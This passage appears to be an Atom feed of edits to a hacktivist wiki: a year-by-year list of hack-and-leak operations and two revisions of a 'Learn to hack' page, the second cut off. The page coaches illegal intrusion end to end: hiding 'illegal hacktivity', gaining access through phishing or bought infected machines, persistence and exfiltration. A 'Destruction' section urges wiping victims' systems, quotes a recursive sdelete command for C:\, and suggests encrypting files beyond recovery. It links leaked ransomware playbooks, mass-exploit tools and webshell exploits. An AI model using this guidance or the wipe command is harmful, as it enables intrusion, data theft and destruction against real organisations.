	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1739</id>
		<title>Hacker History</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1739"/>
		<updated>2024-04-16T18:40:20Z</updated>

		<summary type="html">&lt;p&gt;Booda: SiegedSec - #OpTransRights2&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 2005 ==&lt;br /&gt;
* [[Protest Warrior]]&lt;br /&gt;
&lt;br /&gt;
== 2008 ==&lt;br /&gt;
* [[Sarah Palin emails]]&lt;br /&gt;
&lt;br /&gt;
== 2010 ==&lt;br /&gt;
* [[SRS Electronic Declaration System]]&lt;br /&gt;
* [[Operation Payback]]&lt;br /&gt;
&lt;br /&gt;
== 2011 ==&lt;br /&gt;
* [[Chinga la Migra]]&lt;br /&gt;
* [[CorruptBrazil]]&lt;br /&gt;
* [[Fuck FBI Friday]]&lt;br /&gt;
* [[HBGary]]&lt;br /&gt;
* [[LeakyMails]]&lt;br /&gt;
* [[Shooting Sheriffs Saturday]]&lt;br /&gt;
* [[Sownage]]&lt;br /&gt;
* [[Stratfor]]&lt;br /&gt;
* [[RedHack]]&lt;br /&gt;
* [[LulzSec Sony]]&lt;br /&gt;
&lt;br /&gt;
== 2012 ==&lt;br /&gt;
* [[Apple UDIDs]]&lt;br /&gt;
* [[CSLEA]]&lt;br /&gt;
* [[Norton AntiVirus]]&lt;br /&gt;
* [[Syria emails]]&lt;br /&gt;
* [[Bureau Of Justice]]&lt;br /&gt;
* [[CabinCr3w]]&lt;br /&gt;
&lt;br /&gt;
== 2013 ==&lt;br /&gt;
* [[Project AIG]]&lt;br /&gt;
&lt;br /&gt;
== 2014 ==&lt;br /&gt;
* [[LulzSecPeru]]&lt;br /&gt;
* [[Gamma Group]]&lt;br /&gt;
* [[Russian Interior Ministry]]&lt;br /&gt;
&lt;br /&gt;
== 2015 ==&lt;br /&gt;
* [[wikipedia:Football Leaks]]&lt;br /&gt;
* [[Hacking Team]]&lt;br /&gt;
&lt;br /&gt;
== 2016 ==&lt;br /&gt;
* [[Berat Albayrak Emails]]&lt;br /&gt;
* [[Panama Papers]]&lt;br /&gt;
* [[Surkov Leaks]]&lt;br /&gt;
* [[Catalan police union]]&lt;br /&gt;
&lt;br /&gt;
== 2017 ==&lt;br /&gt;
* [[Bob Otto emails]]&lt;br /&gt;
* [[Cellebrite]]&lt;br /&gt;
* [[Flexispy]]&lt;br /&gt;
* [[Freedom Hosting II]]&lt;br /&gt;
&lt;br /&gt;
== 2018 ==&lt;br /&gt;
* [[Salvini emails]]&lt;br /&gt;
* [[Doxxing-Adventskalender]]&lt;br /&gt;
&lt;br /&gt;
== 2019 ==&lt;br /&gt;
* [[GorraLeaks]]&lt;br /&gt;
* [[Paco Leaks]]&lt;br /&gt;
* [[Milico Leaks]]&lt;br /&gt;
* [[Capital One]]&lt;br /&gt;
* [[GdP (Hambacher Forest)]]&lt;br /&gt;
* [[Perceptics]]&lt;br /&gt;
* [[Cayman National Bank and Trust (Isle of Man)]]&lt;br /&gt;
* [[Iron March]]&lt;br /&gt;
* [[Varela Leaks]]&lt;br /&gt;
&lt;br /&gt;
== 2020 ==&lt;br /&gt;
* [[Luanda Leaks]]&lt;br /&gt;
* [[BlueLeaks]]&lt;br /&gt;
* [[Intel exconfidential Lake]]&lt;br /&gt;
&lt;br /&gt;
== 2021 ==&lt;br /&gt;
* [[Gab]]&lt;br /&gt;
* [[Myanmar Investments]]&lt;br /&gt;
* [[American Patriots Three Percent‎]]&lt;br /&gt;
* [[Verkada]]&lt;br /&gt;
* [[Sons of Confederate Veterans]]&lt;br /&gt;
* [[MagaCoin]]&lt;br /&gt;
* [[Electronic Arts]]&lt;br /&gt;
* [[Tea Party Patriots]]&lt;br /&gt;
* [[Cyber Partisans]]&lt;br /&gt;
* [[HART]]&lt;br /&gt;
* [[Policía Nacional Civil de El Salvador]]&lt;br /&gt;
* [[Epik]]&lt;br /&gt;
* [[Oath Keepers]]&lt;br /&gt;
* [[America&#039;s Frontline Doctors]]&lt;br /&gt;
* [[Twitch]]&lt;br /&gt;
* [[Attila Hildmann‎]]&lt;br /&gt;
* [[Metropolitan Police Department D.C.]]&lt;br /&gt;
* [[Academy of Public Administration (Belarus)]]&lt;br /&gt;
* [[AnibalLeaks]]&lt;br /&gt;
* [[Texas GOP]]&lt;br /&gt;
&lt;br /&gt;
== 2022 ==&lt;br /&gt;
* [[Myanmar Internal Revenue Department]]&lt;br /&gt;
* [[Patriot Front]]&lt;br /&gt;
* [[Belarusian Railway]]&lt;br /&gt;
* [[Pronico]]&lt;br /&gt;
* [[Roskomnadzor]]&lt;br /&gt;
* [[OpRussia]]&lt;br /&gt;
* [[Nauru Police Force]]&lt;br /&gt;
* [[Extractivist Leaks/es]]&lt;br /&gt;
* [[Uber]]&lt;br /&gt;
* [[Liberty Counsel]]&lt;br /&gt;
* [[Fiscalia|Fiscalia of Colombia]]&lt;br /&gt;
* [[Fuerzas Represivas]]&lt;br /&gt;
* [[InfraGard]]&lt;br /&gt;
&lt;br /&gt;
== 2023 ==&lt;br /&gt;
* [[Odin Intelligence]]&lt;br /&gt;
* [[TSA No Fly List]]&lt;br /&gt;
* [[SiegedSec NATO]]&lt;br /&gt;
* [[LetMeSpy]]&lt;br /&gt;
* [[Greater Manchester Police (GMP)]]&lt;br /&gt;
* [[RedAlert]]&lt;br /&gt;
* [[WebDetetive]]&lt;br /&gt;
* [[SpyHide]]&lt;br /&gt;
* [[Rules of engagement - Red Cross]]&lt;br /&gt;
&lt;br /&gt;
== 2024 ==&lt;br /&gt;
* [[SiegedSec - #OpTransRights2 ]]&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Learn_to_hack&amp;diff=1738</id>
		<title>Learn to hack</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Learn_to_hack&amp;diff=1738"/>
		<updated>2024-04-12T15:52:45Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* General Resources */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page aims to compile high quality resources for hackers for both the experienced and inexperienced. All books listed on this page can be [https://libgen.lc found] on [https://libgen.fun/ Library Genesis].&lt;br /&gt;
&lt;br /&gt;
Make sure that you follow good OPSEC when carrying out your operations! See [https://enlacehacktivista.org/index.php?title=Learn_to_hack#Operational_security OPSEC]&lt;br /&gt;
&lt;br /&gt;
== General Resources ==&lt;br /&gt;
&lt;br /&gt;
Resources that assume little to no background knowledge:&lt;br /&gt;
* https://www.hoppersroppers.org/training.html&lt;br /&gt;
* https://tryhackme.com/&lt;br /&gt;
&lt;br /&gt;
Resources that assume minimal tech background:&lt;br /&gt;
* (book) Penetration Testing: A Hands-On Introduction to Hacking&lt;br /&gt;
* [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf Bassterlord Networking Manual (translated)] (Focuses on [https://enlacehacktivista.org/index.php?title=Fortinet_SSL_VPN_Path_Traversal exploiting and hacking into networks via Forti SSL VPN])&lt;br /&gt;
* [https://web.archive.org/web/20230531144434if_/https://cdn-151.anonfiles.com/vcD868ubz5/08a9b897-1685544763/BasterLord+-+Network+manual+v2.0.pdf Bassterlord Networking Manual v2.0 (translated)] (Focuses on [[VPN brute forcing]])&lt;br /&gt;
* Translated: [https://web.archive.org/web/20230404175503if_/https://cdn-150.anonfiles.com/satbX2i8z2/75a3be58-1680631481/Conti_playbook_translated.pdf Conti playbook]&lt;br /&gt;
* LockBit 3.0 CobaltStrike: [https://web.archive.org/web/20230701141731if_/https://cdn-147.anonfiles.com/s1cbD0z3z3/4536e4f8-1688221595/LockBit-CobaltStrike.pdf LockBit 3.0 Guide]&lt;br /&gt;
* Hacking WordPress with [https://github.com/wpscanteam/wpscan WPScan] and [https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html Metasploit]: https://www.exploit-db.com/docs/english/45556-wordpress-penetration-testing-using-wpscan-and-metasploit.pdf&lt;br /&gt;
&lt;br /&gt;
Resources that assume a tech or hacking background:&lt;br /&gt;
* (book) The Hacker Playbook 3&lt;br /&gt;
* [[Hack Back! A DIY Guide]]&lt;br /&gt;
* https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak&lt;br /&gt;
* [https://enlacehacktivista.org/images/8/8f/Flexispy.txt Flexispy Hack Back]&lt;br /&gt;
* [https://enlacehacktivista.org/libertycounsel.txt Liberty Counsel Hack Back]&lt;br /&gt;
* [https://youtu.be/kCLDqvDnGzA Catalan Police Union Hack Back]&lt;br /&gt;
* https://book.hacktricks.xyz&lt;br /&gt;
* [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Pronico Hack Back]&lt;br /&gt;
* https://github.com/Correia-jpv/fucking-the-book-of-secret-knowledge&lt;br /&gt;
* https://github.com/0xPugazh/One-Liners&lt;br /&gt;
&lt;br /&gt;
The Bug Hunters Methodology:&lt;br /&gt;
* https://github.com/jhaddix/tbhm&lt;br /&gt;
* Application Analysis: https://youtu.be/FqnSAa2KmBI &lt;br /&gt;
* The Bug Hunter&#039;s Methodology v4.0: https://youtu.be/p4JgIu1mceI?si=jXcYksd4UqodZDBF&lt;br /&gt;
* Zseanos Methodology: https://www.bugbountyhunter.com/methodology/zseanos-methodology.pdf&lt;br /&gt;
&lt;br /&gt;
Practice labs:&lt;br /&gt;
* https://www.hackthebox.com&lt;br /&gt;
* https://academy.hackthebox.com&lt;br /&gt;
* https://www.pentesteracademy.com&lt;br /&gt;
* https://lab.pentestit.ru&lt;br /&gt;
* https://overthewire.org/wargames&lt;br /&gt;
* https://www.vulnhub.com/&lt;br /&gt;
&lt;br /&gt;
Appsec:&lt;br /&gt;
* https://github.com/paragonie/awesome-appsec&lt;br /&gt;
&lt;br /&gt;
Malware, a collection of malware source code and binaries:&lt;br /&gt;
* https://github.com/vxunderground/MalwareSourceCode&lt;br /&gt;
* https://github.com/ytisf/theZoo/tree/master/malware&lt;br /&gt;
&lt;br /&gt;
=== General references ===&lt;br /&gt;
&lt;br /&gt;
General resources you may find useful for learning. &lt;br /&gt;
&lt;br /&gt;
See [[General References]]&lt;br /&gt;
&lt;br /&gt;
[https://owasp.org/www-project-top-ten/ OWASP Top 10] is a broad consensus about the most critical security risks to web applications. See TryHackMe&#039;s [https://tryhackme.com/room/owasptop10 room] for practical OWASP Top 10 learning and their [https://tryhackme.com/room/owaspjuiceshop Juice Shop].&lt;br /&gt;
&lt;br /&gt;
== Recommended Reading - The Library ==&lt;br /&gt;
See recommended reading [https://libgen.fun books] that will aid you in your learning. See [[recommended reading in the library]]&lt;br /&gt;
&lt;br /&gt;
* [https://theanarchistlibrary.org/special/index The Anarchist Library] ([http://libraryqxxiqakubqv3dc2bend2koqsndbwox2johfywcatxie26bsad.onion/special/index Tor])&lt;br /&gt;
* Phrack: http://phrack.org&lt;br /&gt;
&lt;br /&gt;
== Operational security ==&lt;br /&gt;
&lt;br /&gt;
Operational security (OPSEC) is crucial for protecting oneself from surveillance and maintaining anonymity while conducting hacktivist operations.&lt;br /&gt;
&lt;br /&gt;
=== Recommended Measures ===&lt;br /&gt;
&lt;br /&gt;
Any illegal hacktivity should be done from an encrypted and separate computer or virtual machine, with all traffic router over Tor.&lt;br /&gt;
&lt;br /&gt;
For more information on recommended operational security measures, see [[Opsec Measures]]&lt;br /&gt;
&lt;br /&gt;
=== Secure Messaging ===&lt;br /&gt;
&lt;br /&gt;
Best practice for secure messaging includes proxying connections over Tor and using end-to-end encryption for messages.&lt;br /&gt;
&lt;br /&gt;
==== Recommended Applications ====&lt;br /&gt;
&lt;br /&gt;
For Jabber/XMPP, make sure to enable OTR or OMEMO encryption. For e-mail use PGP for encryption. For file sharing use onionshare.&lt;br /&gt;
&lt;br /&gt;
For more information on recommended applications, see [[Secure Messaging Applications]]&lt;br /&gt;
&lt;br /&gt;
== Initial Access ==&lt;br /&gt;
&lt;br /&gt;
There are many ways to gain [https://attack.mitre.org/tactics/TA0001/ initial access] into a targets network, from phishing, buying credential access, buying infected machines in corporate networks, password spraying, performing a targeted [https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets penetration test] and spray and pray scanning for vulnerabilities and hacking in. Here we list some resources in these regards.&lt;br /&gt;
&lt;br /&gt;
=== Common Initial Access TTPs ===&lt;br /&gt;
&lt;br /&gt;
For more information on gaining a foothold, see [[Initial Access Tactics, techniques and procedures]]&lt;br /&gt;
&lt;br /&gt;
=== Attacking Common Services ===&lt;br /&gt;
Your targets will likely use many services either externally or internally, this could be SSH, RDP, SMB, etc. It&#039;s important to know their common misconfigurations, attack vectors, their attack surface and how to hack these various protocols which may serve as the initial access vector. Here we cover various tools, techniques, common misconfigurations, tips and tricks and we cover both internal and external (publicly accessible) networks.&lt;br /&gt;
&lt;br /&gt;
See [[Common Service Attacks]]&lt;br /&gt;
&lt;br /&gt;
=== Scanning and Recon ===&lt;br /&gt;
&lt;br /&gt;
For [https://attack.mitre.org/tactics/TA0043 scanning and recon] tools, see [[Scanning and Recon]]. Make sure to make use of your tool&#039;s documentation and read the help menu (-hh/-h/--help).&lt;br /&gt;
&lt;br /&gt;
=== Search Engines ===&lt;br /&gt;
&lt;br /&gt;
Search engines are a useful tool for gathering information and intelligence from publicly available sources. Some are paid and some are free. Make sure to operate good OPSEC whenever placing a purchase for any service that will be used in your recon on a target.&lt;br /&gt;
&lt;br /&gt;
For more information on recommended search engines, see [[Search Engines Resources]]&lt;br /&gt;
&lt;br /&gt;
=== OSINT ===&lt;br /&gt;
&lt;br /&gt;
Open-source intelligence (OSINT) refers to the collection and analysis of information from publicly available sources.&lt;br /&gt;
&lt;br /&gt;
For more information on recommended tools and resources, see [[OSINT Tools and Resources]]&lt;br /&gt;
&lt;br /&gt;
== Persistence ==&lt;br /&gt;
Once you&#039;ve found a weakness in your targets infrastructure and have been able to gain [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures initial access] you&#039;ll want to keep it and avoid detection to maintain your access to your targets network for as long as possible.&lt;br /&gt;
&lt;br /&gt;
See [[Persistence]].&lt;br /&gt;
&lt;br /&gt;
== Post exploitation ==&lt;br /&gt;
&lt;br /&gt;
=== Windows ===&lt;br /&gt;
For Windows post exploitation, Active Directory and networking hacking, Lateral movement techniques, privilege escalation, defensive and offensive techniques:&lt;br /&gt;
&lt;br /&gt;
See [[Hacking Windows]]&lt;br /&gt;
&lt;br /&gt;
=== Linux ===&lt;br /&gt;
For performing Linux post exploitation, gaining persistence, evading detection, privilege escalation and more:&lt;br /&gt;
&lt;br /&gt;
See [[Hacking Linux]]&lt;br /&gt;
&lt;br /&gt;
== Exfiltration ==&lt;br /&gt;
One of the main objectives for a hacktivist is that of exfiltrating data, company secrets and if your motivations is that of revealing corruption then this step is of the most importance.&lt;br /&gt;
&lt;br /&gt;
See [[Data Exfiltration]] for techniques and methods for exfiltrating data out of your targets network.&lt;br /&gt;
&lt;br /&gt;
== Destruction ==&lt;br /&gt;
There may be times during a hacktivist operation when you come to the end of your hack, you&#039;ve fully compromised your target, exfiltrated everything you can/want and now before finally leaving the network and leaking all the targets secrets online you want to cause chaos and destruction. [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T As was seen by Guacamaya] where they used &amp;lt;code&amp;gt;sdelete64.exe -accepteula -r -s C:\*&amp;lt;/code&amp;gt; to wipe systems attached to Pronicos domain you might also want to do the same for Linux and Windows systems in your operations, maybe you want to recursively print a text file with your manifesto across a system/network, encrypt files beyond recovery or just delete everything.&lt;br /&gt;
&lt;br /&gt;
See [[Chaos and Destruction]] for different ways to achieve this!&lt;br /&gt;
&lt;br /&gt;
== Hacking Misc ==&lt;br /&gt;
&lt;br /&gt;
=== Web Application Hacking ===&lt;br /&gt;
&lt;br /&gt;
See [[Hacking Web Applications]]&lt;br /&gt;
&lt;br /&gt;
=== API Hacking ===&lt;br /&gt;
Application Programming Interfaces (APIs) are the plumbing of today’s financial services and FinTech infrastructure, enabling FinTechs to embed banking into their apps and banks to offer a more unified experience to their customers demanding more from their bank ([https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf Knight]). [https://owasp.org/www-project-api-security APIs can be exploited] to aid in data exfiltration and taking advantage of an existing service.&lt;br /&gt;
&lt;br /&gt;
See [[Hacking APIs]]!&lt;br /&gt;
&lt;br /&gt;
=== IoT Hacking ===&lt;br /&gt;
* https://github.com/V33RU/IoTSecurity101&lt;br /&gt;
&lt;br /&gt;
=== Hacking The Cloud ===&lt;br /&gt;
More and more of corporate networks are moving away from on-prem to in the cloud. Learning how to [https://hackingthe.cloud hack the cloud infrastructure] of your target is a valuable skill and as time progresses more and more networks will migrate towards the cloud.&lt;br /&gt;
&lt;br /&gt;
See [[Cloud Hacking]]&lt;br /&gt;
&lt;br /&gt;
=== Reverse Engineering ===&lt;br /&gt;
As was seen by [https://enlacehacktivista.org/index.php?title=Hack_Back!_A_DIY_Guide Phineas Fisher], highly motivated hacktivists who seek to hack their targets by any means necessary should consider 0-day research and exploit development, reverse engineering applications and services that their target may be running to gain an initial foothold and perform post exploitation.&lt;br /&gt;
&lt;br /&gt;
See [[Reverse Engineering]]&lt;br /&gt;
&lt;br /&gt;
== Product-specific Hacking ==&lt;br /&gt;
&lt;br /&gt;
=== Google Workspace ===&lt;br /&gt;
https://www.slideshare.net/dafthack/ok-google-how-do-i-red-team-gsuite&lt;br /&gt;
&lt;br /&gt;
=== VMware ===&lt;br /&gt;
* Exploiting vCenter to add vSphere user: https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md&lt;br /&gt;
* VMware Workspace ONE Access and Identity Manager RCE via SSTI. [https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis CVE-2022-22954:] Unauthenticated server-side template injection. [https://github.com/tunelko/CVE-2022-22954-PoC Mass Exploit]&lt;br /&gt;
&lt;br /&gt;
=== Rocket.Chat ===&lt;br /&gt;
* Account hijacking and RCE as admin: [https://web.archive.org/web/20210805092939/https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy]&lt;br /&gt;
&lt;br /&gt;
=== Microsoft Exchange ===&lt;br /&gt;
&lt;br /&gt;
ProxyLogon is dead. It&#039;s mitigated by Defender. ProxyShell is not. AMSI catches unmodified public exploits.&lt;br /&gt;
&lt;br /&gt;
* ProxyShell:  https://github.com/dmaasland/proxyshell-poc&lt;br /&gt;
* Improved proxyshell-poc: https://github.com/horizon3ai/proxyshell&lt;br /&gt;
* ProxyShell (webshell via New-MailboxExportRequest): https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md&lt;br /&gt;
* ProxyShell (webshell via New-ExchangeCertificate): https://gist.github.com/dmaasland/0720891aaf6dec8d3b42a5b92c8d6f94&lt;br /&gt;
* Polymorphic webshells: https://github.com/grCod/poly&lt;br /&gt;
* ProxyShell (no webshell, dump mailboxes via PowerShell): https://github.com/Jumbo-WJB/Exchange_SSRF&lt;br /&gt;
* Proxylogon, proxyshell, proxyoracle and proxytoken full chain exploit tool: https://github.com/FDlucifer/Proxy-Attackchain&lt;br /&gt;
* Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Learn_to_hack&amp;diff=1737</id>
		<title>Learn to hack</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Learn_to_hack&amp;diff=1737"/>
		<updated>2024-04-12T12:44:37Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* General Resources */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page aims to compile high quality resources for hackers for both the experienced and inexperienced. All books listed on this page can be [https://libgen.lc found] on [https://libgen.fun/ Library Genesis].&lt;br /&gt;
&lt;br /&gt;
Make sure that you follow good OPSEC when carrying out your operations! See [https://enlacehacktivista.org/index.php?title=Learn_to_hack#Operational_security OPSEC]&lt;br /&gt;
&lt;br /&gt;
== General Resources ==&lt;br /&gt;
&lt;br /&gt;
Resources that assume little to no background knowledge:&lt;br /&gt;
* https://www.hoppersroppers.org/training.html&lt;br /&gt;
* https://tryhackme.com/&lt;br /&gt;
&lt;br /&gt;
Resources that assume minimal tech background:&lt;br /&gt;
* (book) Penetration Testing: A Hands-On Introduction to Hacking&lt;br /&gt;
* [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf Bassterlord Networking Manual (translated)] (Focuses on [https://enlacehacktivista.org/index.php?title=Fortinet_SSL_VPN_Path_Traversal exploiting and hacking into networks via Forti SSL VPN])&lt;br /&gt;
* [https://web.archive.org/web/20230531144434if_/https://cdn-151.anonfiles.com/vcD868ubz5/08a9b897-1685544763/BasterLord+-+Network+manual+v2.0.pdf Bassterlord Networking Manual v2.0 (translated)] (Focuses on [[VPN brute forcing]])&lt;br /&gt;
* Translated: [https://web.archive.org/web/20230404175503if_/https://cdn-150.anonfiles.com/satbX2i8z2/75a3be58-1680631481/Conti_playbook_translated.pdf Conti playbook]&lt;br /&gt;
* LockBit 3.0 CobaltStrike: [https://web.archive.org/web/20230701141731if_/https://cdn-147.anonfiles.com/s1cbD0z3z3/4536e4f8-1688221595/LockBit-CobaltStrike.pdf LockBit 3.0 Guide]&lt;br /&gt;
* Hacking WordPress with [https://github.com/wpscanteam/wpscan WPScan] and [https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html Metasploit]: https://www.exploit-db.com/docs/english/45556-wordpress-penetration-testing-using-wpscan-and-metasploit.pdf&lt;br /&gt;
&lt;br /&gt;
Resources that assume a tech or hacking background:&lt;br /&gt;
* (book) The Hacker Playbook 3&lt;br /&gt;
* [[Hack Back! A DIY Guide]]&lt;br /&gt;
* https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak&lt;br /&gt;
* [https://enlacehacktivista.org/images/8/8f/Flexispy.txt Flexispy Hack Back]&lt;br /&gt;
* [https://enlacehacktivista.org/libertycounsel.txt Liberty Counsel Hack Back]&lt;br /&gt;
* [https://youtu.be/kCLDqvDnGzA Catalan Police Union Hack Back]&lt;br /&gt;
* https://book.hacktricks.xyz&lt;br /&gt;
* [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Pronico Hack Back]&lt;br /&gt;
* https://github.com/Correia-jpv/fucking-the-book-of-secret-knowledge&lt;br /&gt;
* https://github.com/0xPugazh/One-Liners&lt;br /&gt;
&lt;br /&gt;
The Bug Hunters Methodology:&lt;br /&gt;
* https://github.com/jhaddix/tbhm&lt;br /&gt;
* Application Analysis: https://youtu.be/FqnSAa2KmBI &lt;br /&gt;
* The Bug Hunter&#039;s Methodology v4.0: https://youtu.be/p4JgIu1mceI?si=jXcYksd4UqodZDBF&lt;br /&gt;
Practice labs:&lt;br /&gt;
* https://www.hackthebox.com&lt;br /&gt;
* https://academy.hackthebox.com&lt;br /&gt;
* https://www.pentesteracademy.com&lt;br /&gt;
* https://lab.pentestit.ru&lt;br /&gt;
* https://overthewire.org/wargames&lt;br /&gt;
* https://www.vulnhub.com/&lt;br /&gt;
&lt;br /&gt;
Appsec:&lt;br /&gt;
* https://github.com/paragonie/awesome-appsec&lt;br /&gt;
&lt;br /&gt;
Malware, a collection of malware source code and binaries:&lt;br /&gt;
* https://github.com/vxunderground/MalwareSourceCode&lt;br /&gt;
* https://github.com/ytisf/theZoo/tree/master/malware&lt;br /&gt;
&lt;br /&gt;
=== General references ===&lt;br /&gt;
&lt;br /&gt;
General resources you may find useful for learning. &lt;br /&gt;
&lt;br /&gt;
See [[General References]]&lt;br /&gt;
&lt;br /&gt;
[https://owasp.org/www-project-top-ten/ OWASP Top 10] is a broad consensus about the most critical security risks to web applications. See TryHackMe&#039;s [https://tryhackme.com/room/owasptop10 room] for practical OWASP Top 10 learning and their [https://tryhackme.com/room/owaspjuiceshop Juice Shop].&lt;br /&gt;
&lt;br /&gt;
== Recommended Reading - The Library ==&lt;br /&gt;
See recommended reading [https://libgen.fun books] that will aid you in your learning. See [[recommended reading in the library]]&lt;br /&gt;
&lt;br /&gt;
* [https://theanarchistlibrary.org/special/index The Anarchist Library] ([http://libraryqxxiqakubqv3dc2bend2koqsndbwox2johfywcatxie26bsad.onion/special/index Tor])&lt;br /&gt;
* Phrack: http://phrack.org&lt;br /&gt;
&lt;br /&gt;
== Operational security ==&lt;br /&gt;
&lt;br /&gt;
Operational security (OPSEC) is crucial for protecting oneself from surveillance and maintaining anonymity while conducting hacktivist operations.&lt;br /&gt;
&lt;br /&gt;
=== Recommended Measures ===&lt;br /&gt;
&lt;br /&gt;
Any illegal hacktivity should be done from an encrypted and separate computer or virtual machine, with all traffic router over Tor.&lt;br /&gt;
&lt;br /&gt;
For more information on recommended operational security measures, see [[Opsec Measures]]&lt;br /&gt;
&lt;br /&gt;
=== Secure Messaging ===&lt;br /&gt;
&lt;br /&gt;
Best practice for secure messaging includes proxying connections over Tor and using end-to-end encryption for messages.&lt;br /&gt;
&lt;br /&gt;
==== Recommended Applications ====&lt;br /&gt;
&lt;br /&gt;
For Jabber/XMPP, make sure to enable OTR or OMEMO encryption. For e-mail use PGP for encryption. For file sharing use onionshare.&lt;br /&gt;
&lt;br /&gt;
For more information on recommended applications, see [[Secure Messaging Applications]]&lt;br /&gt;
&lt;br /&gt;
== Initial Access ==&lt;br /&gt;
&lt;br /&gt;
There are many ways to gain [https://attack.mitre.org/tactics/TA0001/ initial access] into a targets network, from phishing, buying credential access, buying infected machines in corporate networks, password spraying, performing a targeted [https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets penetration test] and spray and pray scanning for vulnerabilities and hacking in. Here we list some resources in these regards.&lt;br /&gt;
&lt;br /&gt;
=== Common Initial Access TTPs ===&lt;br /&gt;
&lt;br /&gt;
For more information on gaining a foothold, see [[Initial Access Tactics, techniques and procedures]]&lt;br /&gt;
&lt;br /&gt;
=== Attacking Common Services ===&lt;br /&gt;
Your targets will likely use many services either externally or internally, this could be SSH, RDP, SMB, etc. It&#039;s important to know their common misconfigurations, attack vectors, their attack surface and how to hack these various protocols which may serve as the initial access vector. Here we cover various tools, techniques, common misconfigurations, tips and tricks and we cover both internal and external (publicly accessible) networks.&lt;br /&gt;
&lt;br /&gt;
See [[Common Service Attacks]]&lt;br /&gt;
&lt;br /&gt;
=== Scanning and Recon ===&lt;br /&gt;
&lt;br /&gt;
For [https://attack.mitre.org/tactics/TA0043 scanning and recon] tools, see [[Scanning and Recon]]. Make sure to make use of your tool&#039;s documentation and read the help menu (-hh/-h/--help).&lt;br /&gt;
&lt;br /&gt;
=== Search Engines ===&lt;br /&gt;
&lt;br /&gt;
Search engines are a useful tool for gathering information and intelligence from publicly available sources. Some are paid and some are free. Make sure to operate good OPSEC whenever placing a purchase for any service that will be used in your recon on a target.&lt;br /&gt;
&lt;br /&gt;
For more information on recommended search engines, see [[Search Engines Resources]]&lt;br /&gt;
&lt;br /&gt;
=== OSINT ===&lt;br /&gt;
&lt;br /&gt;
Open-source intelligence (OSINT) refers to the collection and analysis of information from publicly available sources.&lt;br /&gt;
&lt;br /&gt;
For more information on recommended tools and resources, see [[OSINT Tools and Resources]]&lt;br /&gt;
&lt;br /&gt;
== Persistence ==&lt;br /&gt;
Once you&#039;ve found a weakness in your targets infrastructure and have been able to gain [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures initial access] you&#039;ll want to keep it and avoid detection to maintain your access to your targets network for as long as possible.&lt;br /&gt;
&lt;br /&gt;
See [[Persistence]].&lt;br /&gt;
&lt;br /&gt;
== Post exploitation ==&lt;br /&gt;
&lt;br /&gt;
=== Windows ===&lt;br /&gt;
For Windows post exploitation, Active Directory and networking hacking, Lateral movement techniques, privilege escalation, defensive and offensive techniques:&lt;br /&gt;
&lt;br /&gt;
See [[Hacking Windows]]&lt;br /&gt;
&lt;br /&gt;
=== Linux ===&lt;br /&gt;
For performing Linux post exploitation, gaining persistence, evading detection, privilege escalation and more:&lt;br /&gt;
&lt;br /&gt;
See [[Hacking Linux]]&lt;br /&gt;
&lt;br /&gt;
== Exfiltration ==&lt;br /&gt;
One of the main objectives for a hacktivist is that of exfiltrating data, company secrets and if your motivations is that of revealing corruption then this step is of the most importance.&lt;br /&gt;
&lt;br /&gt;
See [[Data Exfiltration]] for techniques and methods for exfiltrating data out of your targets network.&lt;br /&gt;
&lt;br /&gt;
== Destruction ==&lt;br /&gt;
There may be times during a hacktivist operation when you come to the end of your hack, you&#039;ve fully compromised your target, exfiltrated everything you can/want and now before finally leaving the network and leaking all the targets secrets online you want to cause chaos and destruction. [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T As was seen by Guacamaya] where they used &amp;lt;code&amp;gt;sdelete64.exe -accepteula -r -s C:\*&amp;lt;/code&amp;gt; to wipe systems attached to Pronicos domain you might also want to do the same for Linux and Windows systems in your operations, maybe you want to recursively print a text file with your manifesto across a system/network, encrypt files beyond recovery or just delete everything.&lt;br /&gt;
&lt;br /&gt;
See [[Chaos and Destruction]] for different ways to achieve this!&lt;br /&gt;
&lt;br /&gt;
== Hacking Misc ==&lt;br /&gt;
&lt;br /&gt;
